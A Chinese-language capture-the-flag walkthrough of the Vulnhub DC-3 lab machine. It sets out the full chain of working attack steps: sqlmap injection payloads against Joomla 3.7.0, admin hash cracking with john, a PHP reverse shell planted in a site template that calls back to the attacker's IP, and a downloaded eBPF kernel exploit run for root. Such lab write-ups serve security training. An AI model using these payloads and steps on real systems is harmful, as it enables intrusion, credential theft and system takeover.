【渗透测试】Vulnhub DC-3

一.渗透环境环境准备

Vulnhub靶机下载:

官网地址:https://www.vulnhub.com/entry/dc-32,312/

1
2
攻击机:192.168.207.130
靶机:192.168.207.128

下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 目标:获取目标靶机root目录下的flag

进行渗透

二. 信息收集

1. 主机扫描

1
arp-scan -l

c110dcf5f99e6ba4.png

发现靶机的IP地址为 192.168.207.128,然后用nmap对靶机进行详细地扫描。

2.端口扫描

使用nmap获取目标靶机开放的端口

1
nmap -sS -sV -sC -p- 192.168.207.128 -oN nmap_full_scan

adaf6e3b3ca99c22.png

只开了80端口。

我们访问看看9d933ec16433b488.png

登录界面

3.目录查找

1
dirsearch -u 192.168.207.128

1a65d109b98d7220.png

利用dirsearch工具,可与看到administrator这个目录,应该是后台

76c0ea01407801d2.png

4.登录网站并查找漏洞

我们看看网站

ec3c4501a277f08c.png

一个著名的CMS系统,joomla左侧的英文翻译为:

这一次,只有1个flag,一个切入点,没有任何线索。 要获得该标志,您显然必须获得root权限(提权)。 你如何成为根取决于你——显然,还有系统。 祝你好运,我希望你喜欢这个小挑战 。

先安装工具

joomscan 安装方法

1
sudo apt-get install joomscan

使用joomscan进行扫描

1
joomscan -u http://192.168.207.128/

02cc3eeb36afaec6.png

这里我们知道joomla3.7.0 我们可以查找漏洞

网上查找,使用工具都可以,我这里是百度查找

30d5f7b826b9274a.png

这个漏洞是sql注入漏洞

我们也可以利用kali工具看

1
2
searchsploit joomla 3.7.0
earchsploit -x php/webapps/42033.txt

d29d86036d93c352.png
这是查找到的内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
# Exploit Title: Joomla 3.7.0 - Sql Injection
# Date: 05-19-2017
# Exploit Author: Mateus Lino
# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
# Vendor Homepage: https://www.joomla.org/
# Version: = 3.7.0
# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
# CVE : - CVE-2017-8917


URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27


Using Sqlmap:

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]


Parameter: list[fullordering] (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (DUAL)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)

Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)

5.后台爆破

根据提供的SQLmap构建的payload

sqlmap列出数据库库名

1
sqlmap -u "http://192.168.207.128//index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=*" --dbs

546e9bd0327fc620.png

接下来我们去sqlmap列出数据库joomladb下的所有表名

1
sqlmap -u "http://192.168.207.128/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]

91cead2ba4f898c0.png

发现#_users表

列出users表的字段类型

1
2
sqlmap -u "http://192.168.207.128//index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=*" -D "joomladb" -T "#__users" --columns
//查询#_users表内的列名

#__users 里的信息

d57d5e9adcff76ca.png

确定账户名 账号密码一般为“username,password”

爆数据

1
sqlmap -u "http://192.168.207.128/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --dbms mysql -D joomladb -T '#__users' -C 'id,name,password,username' --dump

0dee982e346edd98.png

之后我们使用kali工具 john来解密

1
$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

创建个文件

74c7d9fba1d02d99.png

之后使用命令解密

1
john '/home/kali/桌面/a.txt'

8f962873ea3c26d2.png

所以我们知道

1
2
用户名:admin
密码:snoopy

访问192.168.207.128/administrator

输入用户和密码登录成功

登录到后台1dc394f33b89808e.png

三、漏洞探测

之后步骤是:点击

Exctensions->Templates->Templates

反弹shell

通过对后台的各种查询,发现Extensions->Templates里面的模板可以执行PHP脚本

7e7c00d77264712d.png

进入到界面

555e8413b2b43cca.png这个两个点那个都可以

出现界面

9916f5808a78dd4d.png

点击index.php(其他php文件也可以的)在里面输入脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
当系统没有禁用proc_popen的时候,我们是可以借助proc_popen轻松反弹这样的一个shell的。
$sock = fsockopen("192.168.207.130", "5555");

$descriptorspec = array(

0 => $sock,

1 => $sock,

2 => $sock

);

$process = proc_open('/bin/sh', $descriptorspec, $pipes);

proc_close($process);

放入保存

49678f87795a0ec3.png

之后我们在kali里面监听端口

1
nc -lvnp 5555

之后访问192.168.207.128/index.php

092a7b9613cf7435.png

连接成功

提权

1
2
python -c "import pty;pty.spawn('/bin/bash')"
//使用python 弄交互式页面

8096ad2f030f9e7c.png

权限还是不够所以执行不了cd /root

所以我们去找方法提权

SUID啥的都不行,于是考虑系统漏洞提权

1
cat /etc/*release		#查看发行版信息

8971cbe167394f48.png

发现版本

1
DISTRIB_DESCRIPTION="Ubuntu 16.04 LTS"

利用EXP

searchsploit工具查找Ubuntu 16.04的提权,发现一个“拒绝服务漏洞”,可以用来提权

1
searchsploit ubuntu 16.04

6675d92afe64419a.png

系统是Ubuntu 16.04 LTS ,内核是Linux 4.4.0-21

现在我们可以利用kali的漏洞库去找相关的漏洞,依旧是searchsploit

找到相对应的内核版本

打开文件查看漏洞具体利用方法

1
cat /usr/share/exploitdb/exploits/linux/local/39772.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
┌──(root㉿kali)-[~]
└─# cat /usr/share/exploitdb/exploits/linux/local/39772.txt
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=808

In Linux >=4.4, when the CONFIG_BPF_SYSCALL config option is set and the
kernel.unprivileged_bpf_disabled sysctl is not explicitly set to 1 at runtime,
unprivileged code can use the bpf() syscall to load eBPF socket filter programs.
These conditions are fulfilled in Ubuntu 16.04.

When an eBPF program is loaded using bpf(BPF_PROG_LOAD, ...), the first
function that touches the supplied eBPF instructions is
replace_map_fd_with_map_ptr(), which looks for instructions that reference eBPF
map file descriptors and looks up pointers for the corresponding map files.
This is done as follows:

/* look for pseudo eBPF instructions that access map FDs and
* replace them with actual map pointers
*/
static int replace_map_fd_with_map_ptr(struct verifier_env *env)
{
struct bpf_insn *insn = env->prog->insnsi;
int insn_cnt = env->prog->len;
int i, j;

for (i = 0; i < insn_cnt; i++, insn++) {
[checks for bad instructions]

if (insn[0].code == (BPF_LD | BPF_IMM | BPF_DW)) {
struct bpf_map *map;
struct fd f;

[checks for bad instructions]

f = fdget(insn->imm);
map = __bpf_map_get(f);
if (IS_ERR(map)) {
verbose("fd %d is not pointing to valid bpf_map\n",
insn->imm);
fdput(f);
return PTR_ERR(map);
}

[...]
}
}
[...]
}


__bpf_map_get contains the following code:

/* if error is returned, fd is released.
* On success caller should complete fd access with matching fdput()
*/
struct bpf_map *__bpf_map_get(struct fd f)
{
if (!f.file)
return ERR_PTR(-EBADF);
if (f.file->f_op != &bpf_map_fops) {
fdput(f);
return ERR_PTR(-EINVAL);
}

return f.file->private_data;
}

The problem is that when the caller supplies a file descriptor number referring
to a struct file that is not an eBPF map, both __bpf_map_get() and
replace_map_fd_with_map_ptr() will call fdput() on the struct fd. If
__fget_light() detected that the file descriptor table is shared with another
task and therefore the FDPUT_FPUT flag is set in the struct fd, this will cause
the reference count of the struct file to be over-decremented, allowing an
attacker to create a use-after-free situation where a struct file is freed
although there are still references to it.

A simple proof of concept that causes oopses/crashes on a kernel compiled with
memory debugging options is attached as crasher.tar.


One way to exploit this issue is to create a writable file descriptor, start a
write operation on it, wait for the kernel to verify the file's writability,
then free the writable file and open a readonly file that is allocated in the
same place before the kernel writes into the freed file, allowing an attacker
to write data to a readonly file. By e.g. writing to /etc/crontab, root
privileges can then be obtained.

There are two problems with this approach:

The attacker should ideally be able to determine whether a newly allocated
struct file is located at the same address as the previously freed one. Linux
provides a syscall that performs exactly this comparison for the caller:
kcmp(getpid(), getpid(), KCMP_FILE, uaf_fd, new_fd).

In order to make exploitation more reliable, the attacker should be able to
pause code execution in the kernel between the writability check of the target
file and the actual write operation. This can be done by abusing the writev()
syscall and FUSE: The attacker mounts a FUSE filesystem that artificially delays
read accesses, then mmap()s a file containing a struct iovec from that FUSE
filesystem and passes the result of mmap() to writev(). (Another way to do this
would be to use the userfaultfd() syscall.)

writev() calls do_writev(), which looks up the struct file * corresponding to
the file descriptor number and then calls vfs_writev(). vfs_writev() verifies
that the target file is writable, then calls do_readv_writev(), which first
copies the struct iovec from userspace using import_iovec(), then performs the
rest of the write operation. Because import_iovec() performs a userspace memory
access, it may have to wait for pages to be faulted in - and in this case, it
has to wait for the attacker-owned FUSE filesystem to resolve the pagefault,
allowing the attacker to suspend code execution in the kernel at that point
arbitrarily.

An exploit that puts all this together is in exploit.tar. Usage:

user@host:~/ebpf_mapfd_doubleput$ ./compile.sh
user@host:~/ebpf_mapfd_doubleput$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@host:~/ebpf_mapfd_doubleput# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)

This exploit was tested on a Ubuntu 16.04 Desktop system.

Fix: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8358b02bf67d3a5d8a825070e1aa73f25fb2e4c7


Proof of Concept: https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552
Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip

本地下载即可

kali好像下载不了 我本地下载 然后拉到kali里面, 下载exp到本地

然后拖想要的目录我这里拖到了桌面

aeb1f13e2865660a.png

1
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip 

使用这个链接下载即可

开启apache

1
systemctl start apache2.service

2b91e3135b5631fa.png

之后

移动39772.zip到指定的apache的目录下

1
mv 39772.zip /var/www/html

复制下载链接去访问

1
http://192.168.207.130/39772.zip

回到前面的DC-3的shell中下载刚刚上传的exp

1
wget http://192.168.207.130/39772.zip

2e466e6f0ae75b6b.png

解压exp

1
2
3
unzip 39772.zip			#解压39772.zip
cd 39772 #进入39772
tar -xvf exploit.tar #解压缩exploit.tar

f520e1fe0c8c27a4.png

进入 ebpf_mapfd_doubleput_exploit 运行exp

e0e674689b6ea997.png

接下来就执行刚刚漏洞利用文件演示的代码

1
2
./compile.sh
./doubleput

FLAG

cbe893bb38031bff.png

之后我们权限升升到root

去root根目录找到flag